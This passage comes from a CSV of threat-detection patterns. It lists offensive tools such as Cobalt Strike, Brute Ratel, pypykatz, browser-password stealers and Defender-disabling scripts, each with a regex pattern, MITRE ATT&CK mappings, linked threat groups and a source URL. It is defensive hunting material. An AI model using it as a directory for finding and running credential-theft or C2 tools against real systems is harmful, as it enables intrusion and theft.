TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","54881" "*pip3 install bofhound*",".{0,1000}pip3\sinstall\sbofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","54883" "*pip3 install powerview *",".{0,1000}pip3\sinstall\spowerview\s.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - 
TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","54884" "*pip3 install pypykatz*",".{0,1000}pip3\sinstall\spypykatz.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","54885" "*pip3 install -U pacu*",".{0,1000}pip3\sinstall\s\-U\spacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54886" "*pip3 install --upgrade knowsmore*",".{0,1000}pip3\sinstall\s\-\-upgrade\sknowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","54887" "*pipe\\gsecdump_*",".{0,1000}pipe\\\\gsecdump_.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential 
Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A","54888" "*'pipename_stager'*",".{0,1000}\'pipename_stager\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","54889" 
"*'PipeName'>\NamedPipeMaster*",".{0,1000}\'PipeName\'\>\\NamedPipeMaster.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#namedpipe","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","54890" "*PipeViewer.csproj*",".{0,1000}PipeViewer\.csproj.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","54891" "*PipeViewer_v1.1.zip*",".{0,1000}PipeViewer_v1\.1\.zip.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","54892" "*PipeViewer-main*",".{0,1000}PipeViewer\-main.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","54893" "*pipx install fee",".{0,1000}pipx\sinstall\sfee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","54894" "*pipx install 
graphspy*",".{0,1000}pipx\sinstall\sgraphspy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","54895" "*pipx upgrade autorecon*",".{0,1000}pipx\supgrade\sautorecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","54896" "*pipx upgrade graphspy*",".{0,1000}pipx\supgrade\sgraphspy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","54897" "*Pirate-Devs/Kematian*",".{0,1000}Pirate\-Devs\/Kematian.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","1","N/A","N/A","10","","N/A","","","","54898" "*Pitty Tiger RAT*",".{0,1000}Pitty\sTiger\sRAT.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. 
This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","54899" "*pivot_smb \*",".{0,1000}pivot_smb\s\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - 
T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54900" "*pivot_winrm *",".{0,1000}pivot_winrm\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54901" "*pivotnacci http*",".{0,1000}pivotnacci\s\shttp.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54902" "*pivotnacci -*",".{0,1000}pivotnacci\s\-.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54903" "*pivotnacci *--polling-interval*",".{0,1000}pivotnacci\s.{0,1000}\-\-polling\-interval.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - 
TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54904" "*pivotnacci/0.0.1*",".{0,1000}pivotnacci\/0\.0\.1.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","1","#useragent","user-agent","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54905" "*pivotnaccilib*socks*",".{0,1000}pivotnaccilib.{0,1000}socks.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54906" "*pivotnacci-master*",".{0,1000}pivotnacci\-master.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54907" "*pivots/named-pipe_windows.go*",".{0,1000}pivots\/named\-pipe_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","54908" "*pixiewps 
-e*",".{0,1000}pixiewps\s\-e.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","54909" "*-pk8gege.org*",".{0,1000}\-pk8gege\.org.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - 
Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","0","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","54910" "*pkexec64.tar.gz*",".{0,1000}pkexec64\.tar\.gz.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","54911" "*pkgs.org/download/chntpw*",".{0,1000}pkgs\.org\/download\/chntpw.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54915" "*PKINITtools.git*",".{0,1000}PKINITtools\.git.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","54920" "*pkt_comm/word_gen.*",".{0,1000}pkt_comm\/word_gen\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54921" "*pkt_comm/word_list*",".{0,1000}pkt_comm\/word_list.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54922" "*plackyhacker/CmdLineSpoofer*",".{0,1000}plackyhacker\/CmdLineSpoofer.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","54924" "*playbit@exploit.im*",".{0,1000}playbit\@exploit\.im.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#email","N/A","10","10","N/A","N/A","N/A","N/A","54925" "*Plazmaz/LNKUp*",".{0,1000}Plazmaz\/LNKUp.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","54926" "*Please be sure impacket and ldapsearch are installed and your /etc/krb5.conf file is clean*",".{0,1000}Please\sbe\ssure\simpacket\sand\sldapsearch\sare\sinstalled\sand\syour\s\/etc\/krb5\.conf\sfile\sis\sclean.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","#linux","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","54927" "*Please be sure impacket and ldapsearch are installed and your /etc/krb5.conf*",".{0,1000}Please\sbe\ssure\simpacket\sand\sldapsearch\sare\sinstalled\sand\syour\s\/etc\/krb5\.conf.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - 
TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","#linux","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","54928" "*Please be sure impacket is installed in your system*",".{0,1000}Please\sbe\ssure\simpacket\sis\sinstalled\sin\syour\ssystem.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","54929" "*Please be sure impacket is installed in your system*",".{0,1000}Please\sbe\ssure\simpacket\sis\sinstalled\sin\syour\ssystem.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","54930" "*Please Dont upload sample anywhere*Its been fifth time i am again making this script fud*",".{0,1000}Please\sDont\supload\ssample\sanywhere.{0,1000}Its\sbeen\sfifth\stime\si\sam\sagain\smaking\sthis\sscript\sfud.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","54931" "*Please select command 
[PASSWORDS/HISTORY/COOKIES/AUTOFILL/CREDIT_CARDS/BOOKMARKS]*",".{0,1000}Please\sselect\scommand\s\[PASSWORDS\/HISTORY\/COOKIES\/AUTOFILL\/CREDIT_CARDS\/BOOKMARKS\].{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","54932" "*'Please Turn off your Windows Defender'*",".{0,1000}\'Please\sTurn\soff\syour\sWindows\sDefender\'.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","54933" "*Please use the -Password option to specify a unique password to spray*",".{0,1000}Please\suse\sthe\s\-Password\soption\sto\sspecify\sa\sunique\spassword\sto\sspray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","54934" "*Please use the -User option to specify a unique username to spray*",".{0,1000}Please\suse\sthe\s\-User\soption\sto\sspecify\sa\sunique\susername\sto\sspray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential 
Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","54935" "*plex_unpickle_dict_rce.*",".{0,1000}plex_unpickle_dict_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54937" "*plug_getpass_nps.dll*",".{0,1000}plug_getpass_nps\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
